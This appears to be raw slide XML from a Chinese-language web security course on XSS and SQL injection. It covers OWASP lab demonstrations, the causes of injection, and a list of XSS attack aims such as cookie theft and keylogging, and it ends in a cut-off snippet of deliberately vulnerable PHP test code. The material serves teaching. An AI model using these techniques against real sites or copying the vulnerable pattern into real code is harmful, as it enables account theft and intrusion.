          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904890" y="2204864"/>
            <a:ext cx="10369152" cy="4043212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2034055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6628738" cy="753220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">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脚本在客户端被执行，说明存在一个跨站脚本漏洞。</a:t>
            </a:r>
            <a:endPar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反射式跨站脚本主要用于将恶意脚本附加到</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地址的参数中。</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反射式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8905BD1-6AC4-9D28-2E1A-08C3383B5C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="34260"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2582785"/>
            <a:ext cx="10369152" cy="2992538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74186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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="32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2092304"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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用架构</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7550" y="1700808"/>
            <a:ext cx="4824536" cy="4289123"/>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数据库驱动的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应用通常包含</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层：</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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>浏览器（表示层）向逻辑层发送请求，逻辑层通过查询、更新数据库（存储层）来响应该请求。</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2002471"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注入漏洞</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643877"/>
            <a:ext cx="4967088" cy="4673844"/>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当用户通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表单提交数据时，如果输入框的值没有经过有效性检查，则这些数据将会作为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询的一部分。</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产生</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注入漏洞的根本原因在于应用没有对用户输入进行验证和处理就直接拼接到了查询语句中。</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利用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注入漏洞，攻击者可以在应用的查询语句中插入自己的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代码，并在应用将查询语句传递给后台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服务器时加以解析执行。</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2C08B2CD-9350-8A32-6951-F47FBE8D268D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="995684" y="2229065"/>
            <a:ext cx="4746402" cy="464361"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="8464031" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22805562-F34F-07E9-881F-31A2BFE337FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="17977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表示层</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C81B386-8428-C0A1-186C-2B0D68C4978B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2564482" y="1052512"/>
              <a:ext cx="6666313"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浏览器或呈现引擎</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0956AB-BDF8-4BB2-2DA5-F4F4CF8F2160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="995684" y="2838384"/>
            <a:ext cx="4746402" cy="805792"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="8464031" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0E6B9BE-9E7C-F189-C0D8-B8645E044B0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="17977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逻辑层</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90AA8B8F-B6F4-EB9A-FA60-97F3F4FD2C6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2564482" y="1052512"/>
              <a:ext cx="6666313"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ASP</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.NET</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等编程语言</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70517006-0C0D-5544-EE19-A107FEF12EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1001675" y="3784083"/>
            <a:ext cx="4746402" cy="805792"/>
            <a:chOff x="766764" y="1052512"/>
            <a:chExt cx="8464031" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46219C03-1F0E-D6A6-2CF8-9B3D00C40F69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="766764" y="1052513"/>
              <a:ext cx="1797718"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存储层</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="矩形 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0497E30C-704B-CA8F-CAF3-99A5D826E316}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2564482" y="1052512"/>
              <a:ext cx="6666313"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Microsoft SQL Server</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MySQL</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="e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Oracle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等数据库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1388340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5684761" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">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OWASP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中，选择</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XSS stored</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（存储式跨站脚本）：</a:t>
            </a:r>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存储式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C96566E1-EC82-A4A1-D603-D4E2F3323BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911423" y="2236536"/>
            <a:ext cx="10369152" cy="4000776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C591F4-20FA-CF88-1ABD-583D0667813E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="5914491"/>
            <a:ext cx="1274525" cy="3228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01534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724436"/>
            <a:ext cx="5684761" cy="406971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">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OWASP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中，选择</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XSS stored</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（存储式跨站脚本）：</a:t>
            </a:r>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存储式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6D2580C-D684-A132-9404-33B55BDE8E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2236535"/>
            <a:ext cx="10369152" cy="3974995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C363C2E-8864-B84E-66CA-12909BEF7251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871864" y="3097639"/>
            <a:ext cx="5184576" cy="11234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2863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5" y="1724436"/>
            <a:ext cx="10369152" cy="1099468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">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提交后，弹出对话框。</a:t>
            </a:r>
            <a:endPar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同时提交的内容也会被存储到数据库里，别的用户打开该页面时，这段</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JavaScript</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脚本也会在其他用户的浏览器上执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718467DF-716C-F522-11AA-3171AFBD2D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1157642"/>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存储式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</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1C8CB53C-2C90-1C94-09FA-A4B5A9EA55CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="110" t="421" r="-110" b="29490"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="917505" y="2929033"/>
            <a:ext cx="10369152" cy="3404785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1464861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的攻击途径</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1725578"/>
            <a:ext cx="10441160" cy="82663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上面演示的</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攻击只是显示一个警告框，但是在现实的攻击案例中，攻击者有可能进行更具破坏性的攻击。</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5EDA66AA-63E1-23F4-637A-EEFD43E118B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2672389"/>
            <a:ext cx="10369151" cy="479286"/>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通过</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cookie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窃取实现会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E2AAE1-AAE6-817E-FDD6-4449B6964ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="3348320"/>
            <a:ext cx="10369151" cy="479286"/>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向网页中注入链接或广告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAE2902-199E-E21D-BD70-E68284F79C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="4024251"/>
            <a:ext cx="10369151" cy="476388"/>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3.</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按键记录，将所有输入的文本发送到攻击者网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FC63A1-8448-7C3E-F7CE-D451D5E095E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="4697284"/>
            <a:ext cx="10369151" cy="479286"/>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立即将网页重定向到恶意网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB680A48-E010-86AA-5276-F2D5948C9D4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="5373216"/>
            <a:ext cx="10369151" cy="479286"/>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5.</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网站涂改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2269869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4F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773942" y="1541412"/>
            <a:ext cx="10567144" cy="4770537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E50000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;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&lt;head&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>window.alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>(){confirm(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"Congratulations~"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>);}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD3131"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>align</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>--Welcome To The Simple XSS Test--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>    &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$str =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>( $_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>"keyword"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$str2=</a:t>
            </a:r>
